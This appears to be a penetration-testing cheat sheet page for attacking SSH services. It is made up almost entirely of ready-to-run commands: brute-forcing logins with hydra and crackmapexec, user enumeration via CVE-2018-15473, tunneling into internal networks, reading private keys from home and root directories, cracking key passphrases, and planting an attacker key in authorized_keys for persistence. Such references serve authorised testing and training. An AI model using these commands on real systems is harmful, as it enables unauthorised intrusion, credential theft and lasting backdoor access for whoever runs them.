> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 22 - SSH

> SSH enumeration and exploitation: brute-force, key-based auth abuse, tunneling, and known vulnerabilities.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 22 TARGET
```

### Banner Grab

```bash theme={"dark"}
nc -nv TARGET 22
ssh TARGET
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt ssh://TARGET
hydra -L users.txt -P passwords.txt ssh://TARGET -s 2222
```

```bash theme={"dark"}
crackmapexec ssh TARGET -u users.txt -p passwords.txt
```

***

## Login with Credentials

```bash theme={"dark"}
ssh user@TARGET
ssh user@TARGET -p 2222
```

### Login with Key

```bash theme={"dark"}
chmod 600 id_rsa
ssh -i id_rsa user@TARGET
```

### Specify Algorithm (Old Servers)

```bash theme={"dark"}
ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa user@TARGET
```

***

## User Enumeration

### CVE-2018-15473 (OpenSSH \< 7.7)

```bash theme={"dark"}
# ssh-audit
pip3 install ssh-audit
ssh-audit TARGET

# enum script
https://github.com/epi052/cve-2018-15473

python3 ssh_enum.py TARGET -w users.txt
```

### Nmap

```bash theme={"dark"}
nmap -p 22 --script ssh-auth-methods TARGET
```

***

## SSH Tunneling

### Local Port Forward

Access internal service through SSH:

```bash theme={"dark"}
ssh -L 8080:INTERNAL_HOST:80 user@TARGET
# Now access http://localhost:8080
```

### Remote Port Forward

Expose attacker service to target network:

```bash theme={"dark"}
ssh -R 4444:localhost:4444 user@TARGET
```

### Dynamic SOCKS Proxy

```bash theme={"dark"}
ssh -D 9050 user@TARGET
# Configure proxychains: socks5 127.0.0.1 9050
proxychains nmap -sT INTERNAL_HOST
```

***

## SSH Key Theft

```bash theme={"dark"}
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
cat /home/*/.ssh/id_rsa 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
```

### Crack Key Passphrase

```bash theme={"dark"}
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

***

## Authorized Keys Persistence

```bash theme={"dark"}
# Generate key pair
ssh-keygen -t ed25519 -f key -N ""

# Add to target
echo "$(cat key.pub)" >> /home/user/.ssh/authorized_keys

# Connect
ssh -i key user@TARGET
```

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 22 --script ssh-brute TARGET
nmap -p 22 --script ssh-hostkey TARGET
nmap -p 22 --script ssh2-enum-algos TARGET
```

***

## Quick Reference

| Check         | Command                                       |
| ------------- | --------------------------------------------- |
| Brute-force   | `hydra -L users.txt -P pass.txt ssh://TARGET` |
| Key login     | `ssh -i id_rsa user@TARGET`                   |
| Local forward | `ssh -L 8080:INTERNAL:80 user@TARGET`         |
| SOCKS proxy   | `ssh -D 9050 user@TARGET`                     |
| Crack key     | `ssh2john id_rsa > hash; john hash`           |
